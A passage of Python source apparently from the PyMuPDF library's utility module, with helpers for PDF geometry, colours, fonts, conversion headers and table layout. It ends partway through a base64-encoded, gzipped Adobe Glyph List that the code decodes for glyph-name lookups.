return rc
return (rc[1], rc[0])
def paper_rect(s: str) -> Rect:
"""Return a Rect for the paper size indicated in string 's'. Must conform to the argument of method 'PaperSize', which will be invoked.
"""
width, height = paper_size(s)
return Rect(0.0, 0.0, width, height)
def CheckParent(o: typing.Any):
if getattr(o, "parent", None) == None:
raise ValueError("orphaned object: parent is None")
def EnsureOwnership(o: typing.Any):
if not getattr(o, "thisown", False):
raise RuntimeError("object destroyed")
def CheckColor(c: OptSeq):
if c:
if (
type(c) not in (list, tuple)
or len(c) not in (1, 3, 4)
or min(c) < 0
or max(c) > 1
):
raise ValueError("need 1, 3 or 4 color components in range 0 to 1")
def ColorCode(c: typing.Union[list, tuple, float, None], f: str) -> str:
if not c:
return ""
if hasattr(c, "__float__"):
c = (c,)
CheckColor(c)
if len(c) == 1:
s = "%g " % c[0]
return s + "G " if f == "c" else s + "g "
if len(c) == 3:
s = "%g %g %g " % tuple(c)
return s + "RG " if f == "c" else s + "rg "
s = "%g %g %g %g " % tuple(c)
return s + "K " if f == "c" else s + "k "
def JM_TUPLE(o: typing.Sequence) -> tuple:
return tuple(map(lambda x: round(x, 5) if abs(x) >= 1e-4 else 0, o))
def JM_TUPLE3(o: typing.Sequence) -> tuple:
return tuple(map(lambda x: round(x, 3) if abs(x) >= 1e-3 else 0, o))
def CheckRect(r: typing.Any) -> bool:
"""Check whether an object is non-degenerate rect-like.
It must be a sequence of 4 numbers.
"""
try:
r = Rect(r)
except:
return False
return not (r.is_empty or r.is_infinite)
def CheckQuad(q: typing.Any) -> bool:
"""Check whether an object is convex, not empty quad-like.
It must be a sequence of 4 number pairs.
"""
try:
q0 = Quad(q)
except:
return False
return q0.is_convex
def CheckMarkerArg(quads: typing.Any) -> tuple:
if CheckRect(quads):
r = Rect(quads)
return (r.quad,)
if CheckQuad(quads):
return (quads,)
for q in quads:
if not (CheckRect(q) or CheckQuad(q)):
raise ValueError("bad quads entry")
return quads
def CheckMorph(o: typing.Any) -> bool:
if not bool(o):
return False
if not (type(o) in (list, tuple) and len(o) == 2):
raise ValueError("morph must be a sequence of length 2")
if not (len(o[0]) == 2 and len(o[1]) == 6):
raise ValueError("invalid morph parm 0")
if not o[1][4] == o[1][5] == 0:
raise ValueError("invalid morph parm 1")
return True
def CheckFont(page: "struct Page *", fontname: str) -> tuple:
"""Return an entry in the page's font list if reference name matches.
"""
for f in page.get_fonts():
if f[4] == fontname:
return f
def CheckFontInfo(doc: "struct Document *", xref: int) -> list:
"""Return a font info if present in the document.
"""
for f in doc.FontInfos:
if xref == f[0]:
return f
def UpdateFontInfo(doc: "struct Document *", info: typing.Sequence):
xref = info[0]
found = False
for i, fi in enumerate(doc.FontInfos):
if fi[0] == xref:
found = True
break
if found:
doc.FontInfos[i] = info
else:
doc.FontInfos.append(info)
def DUMMY(*args, **kw):
return
def planish_line(p1: point_like, p2: point_like) -> Matrix:
"""Compute matrix which maps line from p1 to p2 to the x-axis, such that it
maintains its length and p1 * matrix = Point(0, 0).
Args:
p1, p2: point_like
Returns:
Matrix which maps p1 to Point(0, 0) and p2 to a point on the x axis at
the same distance to Point(0,0). Will always combine a rotation and a
transformation.
"""
p1 = Point(p1)
p2 = Point(p2)
return Matrix(util_hor_matrix(p1, p2))
def image_profile(img: typing.ByteString) -> dict:
""" Return basic properties of an image.
Args:
img: bytes, bytearray, io.BytesIO object or an opened image file.
Returns:
A dictionary with keys width, height, colorspace.n, bpc, type, ext and size,
where 'type' is the MuPDF image type (0 to 14) and 'ext' the suitable
file extension.
"""
if type(img) is io.BytesIO:
stream = img.getvalue()
elif hasattr(img, "read"):
stream = img.read()
elif type(img) in (bytes, bytearray):
stream = img
else:
raise ValueError("bad argument 'img'")
return TOOLS.image_profile(stream)
def ConversionHeader(i: str, filename: OptStr ="unknown"):
t = i.lower()
html = """<!DOCTYPE html>
<html>
<head>
<style>
body{background-color:gray}
div{position:relative;background-color:white;margin:1em auto}
p{position:absolute;margin:0}
img{position:absolute}
</style>
</head>
<body>\n"""
xml = (
"""<?xml version="1.0"?>
<document name="%s">\n"""
% filename
)
xhtml = """<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body{background-color:gray}
div{background-color:white;margin:1em;padding:1em}
p{white-space:pre-wrap}
</style>
</head>
<body>\n"""
text = ""
json = '{"document": "%s", "pages": [\n' % filename
if t == "html":
r = html
elif t == "json":
r = json
elif t == "xml":
r = xml
elif t == "xhtml":
r = xhtml
else:
r = text
return r
def ConversionTrailer(i: str):
t = i.lower()
text = ""
json = "]\n}"
html = "</body>\n</html>\n"
xml = "</document>\n"
xhtml = html
if t == "html":
r = html
elif t == "json":
r = json
elif t == "xml":
r = xml
elif t == "xhtml":
r = xhtml
else:
r = text
return r
class ElementPosition(object):
"""Convert a dictionary with element position information to an object."""
def __init__(self):
pass
def __str__(self):
ret = ""
for n, v in self.__dict__.items():
ret += f" {n}={v!r}"
return ret
def make_story_elpos():
return ElementPosition()
def get_highlight_selection(page, start: point_like =None, stop: point_like =None, clip: rect_like =None) -> list:
"""Return rectangles of text lines between two points.
Notes:
The default of 'start' is top-left of 'clip'. The default of 'stop'
is bottom-reight of 'clip'.
Args:
start: start point_like
stop: end point_like, must be 'below' start
clip: consider this rect_like only, default is page rectangle
Returns:
List of line bbox intersections with the area established by the
parameters.
"""
# validate and normalize arguments
if clip is None:
clip = page.rect
clip = Rect(clip)
if start is None:
start = clip.tl
if stop is None:
stop = clip.br
clip.y0 = start.y
clip.y1 = stop.y
if clip.is_empty or clip.is_infinite:
return []
# extract text of page, clip only, no images, expand ligatures
blocks = page.get_text(
"dict", flags=0, clip=clip,
)["blocks"]
lines = [] # will return this list of rectangles
for b in blocks:
bbox = Rect(b["bbox"])
if bbox.is_infinite or bbox.is_empty:
continue
for line in b["lines"]:
bbox = Rect(line["bbox"])
if bbox.is_infinite or bbox.is_empty:
continue
lines.append(bbox)
if lines == []: # did not select anything
return lines
lines.sort(key=lambda bbox: bbox.y1) # sort by vertical positions
# cut off prefix from first line if start point is close to its top
bboxf = lines.pop(0)
if bboxf.y0 - start.y <= 0.1 * bboxf.height: # close enough?
r = Rect(start.x, bboxf.y0, bboxf.br) # intersection rectangle
if not (r.is_empty or r.is_infinite):
lines.insert(0, r) # insert again if not empty
else:
lines.insert(0, bboxf) # insert again
if lines == []: # the list might have been emptied
return lines
# cut off suffix from last line if stop point is close to its bottom
bboxl = lines.pop()
if stop.y - bboxl.y1 <= 0.1 * bboxl.height: # close enough?
r = Rect(bboxl.tl, stop.x, bboxl.y1) # intersection rectangle
if not (r.is_empty or r.is_infinite):
lines.append(r) # append if not empty
else:
lines.append(bboxl) # append again
return lines
def annot_preprocess(page: "Page") -> int:
"""Prepare for annotation insertion on the page.
Returns:
Old page rotation value. Temporarily sets rotation to 0 when required.
"""
CheckParent(page)
if not page.parent.is_pdf:
raise ValueError("is no PDF")
old_rotation = page.rotation
if old_rotation != 0:
page.set_rotation(0)
return old_rotation
def annot_postprocess(page: "Page", annot: "Annot") -> None:
"""Clean up after annotation inertion.
Set ownership flag and store annotation in page annotation dictionary.
"""
annot.parent = weakref.proxy(page)
page._annot_refs[id(annot)] = annot
annot.thisown = True
def sRGB_to_rgb(srgb: int) -> tuple:
"""Convert sRGB color code to an RGB color triple.
There is **no error checking** for performance reasons!
Args:
srgb: (int) RRGGBB (red, green, blue), each color in range(255).
Returns:
Tuple (red, green, blue) each item in intervall 0 <= item <= 255.
"""
r = srgb >> 16
g = (srgb - (r << 16)) >> 8
b = srgb - (r << 16) - (g << 8)
return (r, g, b)
def sRGB_to_pdf(srgb: int) -> tuple:
"""Convert sRGB color code to a PDF color triple.
There is **no error checking** for performance reasons!
Args:
srgb: (int) RRGGBB (red, green, blue), each color in range(255).
Returns:
Tuple (red, green, blue) each item in intervall 0 <= item <= 1.
"""
t = sRGB_to_rgb(srgb)
return t[0] / 255.0, t[1] / 255.0, t[2] / 255.0
def make_table(rect: rect_like =(0, 0, 1, 1), cols: int =1, rows: int =1) -> list:
"""Return a list of (rows x cols) equal sized rectangles.
Notes:
A utility to fill a given area with table cells of equal size.
Args:
rect: rect_like to use as the table area
rows: number of rows
cols: number of columns
Returns:
A list with <rows> items, where each item is a list of <cols>
PyMuPDF Rect objects of equal sizes.
"""
rect = Rect(rect) # ensure this is a Rect
if rect.is_empty or rect.is_infinite:
raise ValueError("rect must be finite and not empty")
tl = rect.tl
height = rect.height / rows # height of one table cell
width = rect.width / cols # width of one table cell
delta_h = (width, 0, width, 0) # diff to next right rect
delta_v = (0, height, 0, height) # diff to next lower rect
r = Rect(tl, tl.x + width, tl.y + height) # first rectangle
# make the first row
row = [r]
for i in range(1, cols):
r += delta_h # build next rect to the right
row.append(r)
# make result, starts with first row
rects = [row]
for i in range(1, rows):
row = rects[i - 1] # take previously appended row
nrow = [] # the new row to append
for r in row: # for each previous cell add its downward copy
nrow.append(r + delta_v)
rects.append(nrow) # append new row to result
return rects
def repair_mono_font(page: "Page", font: "Font") -> None:
"""Repair character spacing for mono fonts.
Notes:
Some mono-spaced fonts are displayed with a too large character
width, e.g. "a b c" instead of "abc". This utility adds an entry
"/DW w" to the descendent font of font. The int w is
taken to be the first width > 0 of the font's unicodes.
This should enforce viewers to use 'w' as the character width.
Args:
page: fitz.Page object.
font: fitz.Font object.
"""
def set_font_width(doc, xref, width):
df = doc.xref_get_key(xref, "DescendantFonts")
if df[0] != "array":
return False
df_xref = int(df[1][1:-1].replace("0 R",""))
W = doc.xref_get_key(df_xref, "W")
if W[1] != "null":
doc.xref_set_key(df_xref, "W", "null")
doc.xref_set_key(df_xref, "DW", str(width))
return True
if not font.flags["mono"]: # font not flagged as monospaced
return None
doc = page.parent # the document
fontlist = page.get_fonts() # list of fonts on page
xrefs = [ # list of objects referring to font
f[0]
for f in fontlist
if (f[3] == font.name and f[4].startswith("F") and f[5].startswith("Identity"))
]
if xrefs == []: # our font does not occur
return
xrefs = set(xrefs) # drop any double counts
maxadv = max([font.glyph_advance(cp) for cp in font.valid_codepoints()[:3]])
width = int(round((maxadv * 1000)))
for xref in xrefs:
if not set_font_width(doc, xref, width):
print("Cannot set width for '%s' in xref %i" % (font.name, xref))
# Adobe Glyph List functions
import base64, gzip
_adobe_glyphs = {}
_adobe_unicodes = {}
def unicode_to_glyph_name(ch: int) -> str:
if _adobe_glyphs == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
name, unc = line.split(";")
uncl = unc.split()
for unc in uncl:
c = int(unc[:4], base=16)
_adobe_glyphs[c] = name
return _adobe_glyphs.get(ch, ".notdef")
def glyph_name_to_unicode(name: str) -> int:
if _adobe_unicodes == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
gname, unc = line.split(";")
c = int(unc[:4], base=16)
_adobe_unicodes[gname] = c
return _adobe_unicodes.get(name, 65533)
def adobe_glyph_names() -> tuple:
if _adobe_unicodes == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
gname, unc = line.split(";")
c = int("0x" + unc[:4], base=16)
_adobe_unicodes[gname] = c
return tuple(_adobe_unicodes.keys())
def adobe_glyph_unicodes() -> tuple:
if _adobe_unicodes == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
gname, unc = line.split(";")
c = int("0x" + unc[:4], base=16)
_adobe_unicodes[gname] = c
return tuple(_adobe_unicodes.values())
def _get_glyph_text() -> bytes:
return gzip.decompress(base64.b64decode(
b'H4sIABmRaF8C/7W9SZfjRpI1useviPP15utzqroJgBjYWhEkKGWVlKnOoapVO0YQEYSCJE'
b'IcMhT569+9Ppibg8xevHdeSpmEXfPBfDZ3N3f/t7u//r//k/zb3WJ4eTv2T9vzXTaZZH/N'
b'Junsbr4Z7ru7/7s9n1/+6z//8/X19T/WRP7jYdj/57//R/Jv8Pax2/Sn87G/v5z74XC3Pm'
b'zuLqfurj/cnYbL8aEzyH1/WB/f7h6H4/70l7vX/ry9G47wzK/hcr7bD5v+sX9YM4i/3K2P'
b'3d1Ld9z353O3uXs5Dl/7DT7O2/UZ/3Tw9zjsdsNrf3i6exgOm57eTsbbvjv/1w2xTnfDo5'
b'fnYdjA3eV0vjt25zXkRJB36/vhKwN+kEw4DOf+ofsLuP3pboewGISO7bAxPkUU+EaUD7t1'
b'v++O/3FTCESmcsILgQRuLhDs/w857lz6NsPDZd8dzmtfSP85HO8GcI53+/W5O/br3QkeJa'
b'9NERmPKgE2Ue+73vgj97Ded5TH1pPDEFCT4/35RFFtAMORMezXb3dwiioCsYe77rABjjCO'
b'jHs/nLs7mx3wuYFYX+HsEQyTfHg/DY/nVxa0rzmnl+6BVQfeegTyemSlOdjqczqJ0J9/ev'
b'fp7tOH1ed/zj+2d/j+9eOHf7xbtsu75jcw27vFh19/+/jux58+3/304edl+/HT3fz9kq3i'
b'w/vPH981Xz5/APR/5p/g9/+Qhb+/3bX/8+vH9tOnuw8f79798uvP7xAcwv84f//5XfvpL/'
b'D97v3i5y/Ld+9//Msdgrh7/+Hz3c/vfnn3GQ4/f/iLifja492HFbz+0n5c/ARg3rz7+d3n'
b'30ycq3ef3zO+FSKc3/06//j53eLLz/OPd79++fjrh0/tHRIHr8t3nxY/z9/90i7/AxIg1r'
b'v2H+37z3effpr//PPN1CIF47Q2LUSdNz+3NjakdvnuY7v4/BcEGb4WyEPI+DMT++nXdvEO'
b'n8iWFomaf/ztL8wZhPqp/e8vcAbm3XL+y/xHpPH/xlnDejXKHJTQ4svH9hdK/mF19+lL8+'
b'nzu89fPrd3P374sDSZ/qn9+I93i/bTD/D+8wcWxOruy6f2L4jl89xEjkCQaZ9+4Hfz5dM7'
b'k33v3n9uP3788uvndx/e/zu8/vThn8ggSDqH56XJ6Q/vTZKRVx8+/sZgmRemIP5y98+fWu'
b'Ao8vc+z+bMjE/Iu8Vn7RBxIis/q7TevW9//Pndj+37RWuz/AND+ue7T+2/o+zefaKTdzbq'
b'f84R7xeTdJYYJLOf7z4xq11N/osp2bt3q7v58h/vKLxzjtrw6Z2rOSbzFj+5rEd7+P84UL'
b'xH8/6vO/lj2/6Pu7eX7d3P6C3Y2tb3u+7ua3dkA/yvu+w/JqyV6GeUt0/dy7nb36MjySZ/'
b'MUMO3Hz5+LNycsdx54SB5wmN/XJvRh0z/vz1/PaCf4Zhd/rP9dPur/j7eDDtfIV+dX3+r7'
b'vz63B36vb9w7AbDn/ddLseown7kr7bbU4YIhD6/03//e7JiM0O669/vbyg1/hPdKLd8WGN'
b'PmnXoSs52h5200OGk/WW/fvdl0NvhpHTw3q3Pt59Xe8uCOARA8ydCcX433Z/rjfonfbrnf'
b'hP5j9MJtM0mbf4XZT4XT9czt0Pk3S1ALFfPxyHA6g2A3WCz90Pq6qFO+dsskjdtzAB3B+7'
b'rwwDeWi/reu0nbcOeMBostv1Dz9MpsuJwzbD+b5DcuGuKR32dFx/pcfGO9oOw7MZlAj64M'
b'/9bmOAaTJ/WFuJF0t898eHXfdDNmV4JC77x133J8XONCDiTTWq5JkvNMMLNY9C1ZLNa82R'
b'rIki9ULP50AZ/6pczOyn92DSE3IqRSZs7nc2+gmqKMi+O3an/sQkTQOpszcLsBTnsg2gSE'
b'f/KskTQ4YaANrFPFn4b/ELIEo/Iu2jQkbg/QEtEJXe1Y6MtWP3sl3/MMlnqf08D4cBaclr'
b'5KzEzHTuyXhZPyCXVhkcD0/DoXsmEwEfoWVQqsJ+Sg2eW9qniOGQFqHh3n+XCNMWCMLJ3b'
b'c4BPB2vz5CYenXkKjI06Rhu8mSJlSxKmmQX+uHB6g1jC0ztEQ+TRqdISmC6A46TLiH/sfM'
b'wBczE0mo4WrXHzoJpUyaKCvglLnpJC1XiEWSBN55eIHcDChLFpQ4TxZrHWkL2mUXwl6Yto'
b'N6OLefEmyRLHy7mizwDT1yt1szryqhfCOa1AJJBtKVZFRtCd8WU3pATvFrbr5cHlo6Dome'
b'tzoF0xmAbn3/vF2fgKgcbhbkKCCrCKBYETp0uZt+2siJ5pSGc92+kOVgbLVIOREE/rw+jc'
b'JfNGSxGWBysYMmOzxrCU3qelSBOUV1VQCf456kXEGaqB4gykGJUKTJQupBnixZ9NNk+S+2'
b'ihS/0kkCjOoD6ccjhCO3niVLKfYW367Y0xY90TIU6MwSVkRfVdMM6HFYsxzpPGobc0NLrV'
b'4ky6htQIoOA9rLmWTeIupuh6aRZaij5vPp2LH15zO49PmEMH1niBrcCCWd60KgH00/Bmgp'
b'kM8t9NzL/mm930scS/j7XYuHlr2MGiXkiwoDQvnESoFVyfKEarx1uSGFA7ehkULobywiRP'
b'BNiqgAcbOCo9MFRwtGp1GVn6wSDuzTImllwJ65b2mcAPyAjZxvfcTpHN+2xC0bZboApKt6'
b'joBDPZhbIgyyEeD7B7Sx9kZ1qTWqKgeUkvZ66MUI1N4eejGytzeG3kgUP/QumFyVWyD1+E'
b'pSja9NICVYYqbrSkvzJV2Xo0WhQfIedV+EsGU0rd23hAogyuUKtNZ7kBjOxTEPBT9LS/Cv'
b'BlfE32OqDgVzo+JFfWt3uqkhATv4OEhYCFtGXrRhR/jCY7Is4kuCVWavQ0QdiVoDqoiute'
b'kS9K0eFjpDy3E8nc75EdVjKGbtgVmg+1KkWtQAVp/hpaPQM1SNl1O/YwryWeEJUS3gUkeb'
b'wTnzDLP+DdtgG0jtClLrXh86SHu6mQoIb1r5HM1KWjmksEN7xQ9VsjVpEQ1ezvA7gUqMD+'
b'97RcpruAv3Le0G8V2Oww/ZBDpq+40xQxPBh2/G6D1BqRSiKq7YJ5TJKjTdJlnpDjptk1U0'
b'phVwrbvkabJy/S5Ut1UPnyELqgwIovM1Cm6jCoGgMDERdp6sJJ/K5EeKViU/Nqc/Lutj90'
b'OeYwD8UVS6Kb7RNzMrc/sZhqsZmYenfh3EnCc/StfWJj9KniAe0WFSKFE/hpxYWEK0k5TA'
b'wIh806Z72+hRd37UjZ50NJBBxu16o3UD+N1iHrjZ7LpRfab42+5KJ5gZH5eX8+WomxFq+Y'
b'++BBALJnWqVgGIRywArlFjJgefUXkgf/142NpPKQ84le/KfdtYs1kD2gjLDJ0mP7Hg6uSn'
b'tEb8P2TFYmW+p/xGo+B3kfK7SX7CQF4ZPE1++lUKGh3sT+tbAx3G5J/WN5WyDIzj5tQ/ae'
b'cZYrMDKqraT6b8fWshK2gxGcINBb+0hBQ8uuifpPuHY4SlmwhqwU+qg6frKFcRttbIphPQ'
b'R9WCwJesxfcF85bjZb9bX84siFWEiBYBh98kv1AF3jHTZ8k7PUvMVsm7v0F+TCjefdF4m7'
b'wTJWDpvmXIAeBbSrZI3on2gcBCFrWWCAN8BEhYRFXlK5N3elStQapRdRVIP8hQ0huaNirZ'
b'u6sBmN5NW8wn5kvaoqNFjZgn77qrpQeIFrXXInn3eFw/o62hZ8IU7Z2M0Qv3LREDiNQOJK'
b'vXQZEej8mQoT9th+NZO0TxyYCL+ukInW4UZFS14AO1SrX3Jnk36ByH4DIyMjMHO/jMzJfq'
b'MEsDhNLI0VCJyIAEUiopfEt7xzj2zk2XU9T0d9GQxPrzbdufT9GgMPWgrwuaWSZ/Y02eJ3'
b'+L5nZp8rdQ+VaWkPaJucrfok6uTv42mog1yd+ijEP4kpx58ndG2SR/V0NNkfz976E/WiZ/'
b'X99DZ3/uoxF+AtjV1Nx8q8JEqDd7qhkZYwUmB/byYoqG7OuuvwX63cnibJH8XQa0Gt8yoO'
b'UlKJ9v0JT/Ho9fZKuWgX7i7/FYPwUQLU2skr9vdTKh0/19q9UBhOgHI0gSjz0QU8+WUGx/'
b'jwoFJTAgF5SXemIhmYEhH066cZUEfEE2yc8syEXyM3s9aIU//4yuEtXlZ6815DN87+83Jq'
b'fh3OdavsR3yDVyJNdSS8STlByRjPISnlz/szJfgWNp8VoGUoZiqH8/969RViOG35kMcOJs'
b'RBqibJwnP0fZCI9+gol2Y79l3IBnya9F8gvza5n8oip+mfxihVqVUD7tt0yJVwRchW+TX0'
b'ImZckvekjEGPeLSjJ0nV+iejSdJr9EMkMGEQvfVHGMioqq/cuFhbVI3lPWNnlvynaevPdl'
b'Os2T974coS++D+WIye77IGJuibgc0dG8j8uRnqKkTA0tHsrkPSv4rnuk69kyeY+yEBW2Tt'
b'6bQmvwGxUa4tGFBv3ofZQBSNjwqnMI8UiOgOmXJJep+5Y5AQCTQ8vkA3NolXzARD8tMvxK'
b'qc+TD37AX+buWwIAACXpGM1y0I048Nbwi+C8ioAS+eBzH7J9YK7Bw8aPCTPIE8pgaglRG5'
b'YR4KsW6t2HmysAy1oz/LxzmWlUD8Vx8JLgCPXzKWgAH3T/jXRhfPKVrJgYUlSXBcigutDv'
b'rXxSsEROTCkjCMiMz1JUDQCnajBhkaqxAhD1zwXoPeodVNIPkQ7Skj6yUDBImU/J3LmllR'
b'BtZiHJ0IWlo6x0IfrsahmsVlVtHvWMEcFdKTzwLroNeugP8WICa2u8mMDA9t3T2iWOn7rb'
b'd1w/LmCKbejjcDnoalzNLX7uzzutF1ULh3v1BrV031vx8pkQwqZz3VrhQjV6CCNKFtuGJc'
b'J+CXy7FQn0rh9c3zxhZTbfMqVtHSDFTRe+D0CUduDXzrX6WJH2vUThvn0GM8sNoOYxU+9B'
b'4iuSX+EZWf+rFMw0+TU0X/B111iUya+R0rwCHaldcwA3p7hzeLXr2/ywCsMccRkI8fevR1'
b'3P8+RXnf9Qtn49Gac1P3QmkOOSg+//ZnLS5L9DEsrkv6OQwBT3afKR7rPkY6R7LkD7bmCa'
b'fPS9XVHjW8Ya5MXHEEsFIhpVyFb9RzoBqXOyNrRvkMU8kKIiFJAj1s4QiJqjgL0dmCdIRt'
b'jbKlcLknFrTJFEPRoVbfIxyhXwJVf8tw8E/ut0hJ0uLx2tXMBryuQTczFPPq24YzeZYHqP'
b'/hJU5qh0Sir31ITU1FM1qcJRufFXOiozVOV5JpTa+zO8mXdJnoncxM4YUpElI+VdlimozL'
b'ssycu8SxQaKC81OltQXuqS6cu81IUJxUtdVKS81MWSlJe6oJyZl7poQOXisiUlLlekxOWc'
b'lJe6YPqmIvWMlJe6pNRTL3XJtE+91IWhvNQlZZl6qUtKPfWylCyHqZelNPF5WUrmxFRkYe'
b'yFl6Wgv0JykPlZSA4yzwrJQaa9EFmQPmll/ls3EYqw3r/0vsvHAPTJN8XSf0ceSgdKS0BB'
b'qAaLzH7YvvITvb/51OsBtYVubaNDutDSa0vIXJTlGzX9jDU6kmtiaN/2WOU8GTmDt7gzhf'
b'jR+jzSF2+AVgT05AxBbB9iCIUVzdcQ+zZy0SB5236vlk6Rov7JrLTOUYD9nyIAqkHUa4A7'
b'PJ7Ha3DwLn0JXJwZlszn5slndhbT5POaSiyGgM92wQ6p+yzFCzQUHDLsc8j/mSVirR49/+'
b'e4/6WnKHfnhpZCWCSfow1iOL+5+Tunw1AEiL07n6KNW8i6dbv3NT7d0LbgJ/WxCRQp8ymD'
b'Lmlkh4SJqNWgXJIfzwyh4n/WvTemB5+jcoAIesERk97PUEgee6OwNwtDnXrW1npqiPPrQC'
b'Gr5POxg47h1WhiCDtKH5Sxz6d4Z7EB4gsY4b12O7XkD+brIFSafGFxF8kXmY7M3bfkBwA/'
b'uUCxfJHJRY5vKfa5JcJEotGA1INSoxID3aoUIWCl6aPufNEj9RSk0vQXgfQ+llXAJOYsYJ'
b'KCmcKU2cAkwC7WlMm5NtUpAihpoTxKk4e0MnuYuW9xC0Cr9JiefPGThJX99Gofpn9fRpME'
b'iqknCVB0v4wnCegqvkSThBZ0PElg9mpIZwTy7EpTgYxab6wgmGQIGvGX6zXS1oNK1a3oUj'
b'cRZKWo7Cwr2SacF55I2T8Jy+QM03p6298PO+nAcnEgi6lN6jG9ntqMwRuBTb2bwIuEkPkI'
b'0mhNnVI0/i/jheQJMd8ikR7MG9bcJdb9WBvga+MTlJGfv2MY+hLNJCoPSFWfJv9goy6Tf4'
b'T22ST/UHUHU5N/RBOFDHS02gEHrsdpwIuKCuFG2yd18g9JHHi+rmFK90+KUSX/9KLWWfLP'
b'INLCEjJSQ+5/qipSk1QjBKZq/1RJqOvkn77q15Pkn5GIiFNEqpL/oRh18j8h6mXyPzqmBU'
b'gd0zz5n2ikz+Ges5tZm/xPFA8ClXjq5DfGM0t+k6506b6lwRPQpY6x5bcgVWuJkCFl8luo'
b'sSljuOpuVsC06K2hpY+YJr9hHqA714bI5Va3h+B9hqLl/+aLP7efvktZQSi9wzEtQOu6Xo'
b'GOhkfonL9FuYYsklzDt68wFOByuu+fdAbNHXbLYGJB3q4/n3e6LkNREfiWrzr5F8tpnvwr'
b'Mq8qQfsRZ5aIGVa1dN8y/K8ASJE5whVZ2s4myb/sonPVmC9ReBztS2aWJf+KWmAF+ub2RE'
b'3GDa23BW7VGoi+7XRa5gTGO2qLlKiO0vi7Gafl3Ih0kfxLazqzafKvqGgRsxQtv/2uVFMk'
b'tEmEvrFe33cYbXZoTzM06bVvLC1Zm+4rnM0mxJ8uv6+P6zPczWtLH/eXZ65RzA1/v0Z3qc'
b'C8BXi8yML5JAf9dYD2QwU4RNq0Gncx5hGooqbre2Zlb87D7NfHZ121VxFXBYhhVScUyb8f'
b'Xob98Dj8kNN+ay2G2Ln7FkvnlQN0vqcO03ZLlcPEENs7igySfPBipgJRZAsZiZO6vJxYQl'
b'Q4TEXWNwyxC41qq+SlZoghdqXRyBB5pjlict0kvkZAczefJoKH/T2qelpZyFKT1FFDRLoS'
b'KJx3LtkMXCRBYzUABm0XwJQ+Qi7nyAG9pgzuZrN+VnWsIuTqKPJB6aFQ9G7OTfMAB70Rgu'
b'iMSw0ZlidBmxaBWh4WF5G73fNw7FDvcq7srrvgAZE89v2EO/g/QOzCkvVsmtL4aGrIdII+'
b'yFqqe7K2xs6enFlFwJHZxFrJeDK11p+ezOyevCdzu7ftyantXjxZ2A7Ok6XdhPdkZbfaPV'
b'nbzVpPzqwpnCPzibVj82RqzdY8mdmNAk/mdg3Uk1NrU+bJwhqLebK000xPVnYm4snaWgZ6'
b'cma3Wh05ndiJmCdTa9LsycxO/T2Z22m/J6fWLsaThR2kPVnaGbsnK2vw5snaGo94cmZtTB'
b'xZTKwxkidTayDrycxaH3kyt1aWnpxao1VPFtZaxJOlHeg9Wdk9fk/WdlPUkzO73ebIcmKn'
b'qJ5M7Ua0JzOrLnsyp8WNSFVOSYpUZeEarSMpVS4FWlKqXNJbUqpc0ltSqlxCrihVLiFXlK'
b'qQoCpKlUvyK+ZVLsmvmFe5JL8yUknyKyOVJL8yUknyKyOVJL8yUkn51kYqyY2aUuVSvjWl'
b'mkrya0o1FZlrSjWV5NeUairJrynVVJJfU6qpJL+mVFNJb02pppLeGaWaSnpnlGoq6Z0ZqS'
b'S9MyOVpHdmpJL0zoxUkt6ZkUrSOzNSSXpnlGomCZxRqsInEADJXEhTglMhKVVRCEmpilJI'
b'SlVUQlKqohaSUhUzISlVMReSUhWNkEYqn8A0NVL5FKWmdU9WQpZ2DuDJyppoerK2xjmORM'
b'ai8ovMJmMLCcpkbCnJNxlbBZIRVT75NbpNBFUJaUL26a2NVEub3gy5nE1cg8y5MDxx4mO4'
b'JWHLrqhyVs6ynAsJ4UvXrkGyVpTlRMicZCrklGQmZEEyF7IkORWyIlkIyYjKUsgZycqRU9'
b'aKsqyFNELOhKQYbnAhyZDdeEGSQWVeyCmLsswyIRlUlgvJBGZTIRlyVgjJBGalkExgJkKm'
b'TGAmQnKYLjMRksN0mc2FNFKJzJmRaiGkkWoppJGqFdJIJQnkMF3mEyEpVS7p5TBd5pJeDt'
b'NlLunlMF3mkl4O02Uu6eUwXeaSXg7TZS7p5TBd5pJeDtNlLunNjVSSXo6t5VSE5NhaTkVI'
b'jq3lVITk2FpORUiOreVUhGTrK6ciJOt5ORUh2dzKqUjFwbScilSFEUOkKowYUgqFEUNKoT'
b'BiSCkURgwphcKIIaXAwbQsJIEcTMtCEsjBtCwkgZURw+dkwZ6qnE+FZFBVKySDqkshGdSs'
b'FpIJnHsxClOfq5mQTFEtjk19nqVCMkXNXEgGtfRCFqYElz6fUQ+ohXrHJUuhaLyQJRNYLH'
b'yRoZ2DXE6EpONlKmRJMhOyIhn8MqjlVMgZSRGDWVcsSyFTkpWQGclayJzkTEgjlSShMlI1'
b'QhqpFkIaqZZCGqkkvZWRymd7ySG+aCW97EWLVtLLIb5oJb0c4otW0sshvmglvRzii1bSyy'
b'G+aCW9HOKLVtLL/rloJb0c4otW0jszUkl60T+vmiyQBUmf/Ap97KqZBpJc6UUrdm7FaiIk'
b'xVilQlKMlU9ghQ5q1Ug3UnGYKJqpkExvE7imIpVCMqJGxOAwUTS1kIyoqYRkehsvVc1hom'
b'gyIVkKTSokS6HJhaRUi+CYUi2CYyPGTEgjhq8bdW7i9XWjnpqIVkIyooWXasZONXN+yzRD'
b'B5WlTicHiSLLUjdBK9McXVCWujlXmRY04p9kCyGnJJdCFiRbR7LRYSh3jvO0NCOsczydcS'
b'qUUWa/kcHqqldniiRanAG57Y/rp/Vh/UPOk7jraNoPifuwMsL5Sa+XRiBU76bYnKrGR5UR'
b'dK9iNp5V1MbDeF2IXTpvUlnfMwwz0PSHRyA7h61ogQ4M/517jTZE990mAhcER7ZUTNKNlS'
b'aqVP14pWkagSoxdP28PuOvybd5Fsjtevf42m/O2x9WKy5ByDoAR5Fd9+i6THxJMqldgN6s'
b'n7rT1iwGvrJpWVdx6uvWgNv1/tvalFIIJB9xRh6ngW0WM4LHYsQZeawt24olwu/WyGyR1a'
b'VtzzWYkVjZiDMK3bOfT5fjWnxxLA9w7GU10bxxRVjlmjuqECubCS8oqpDPmc3SP7hIeQqo'
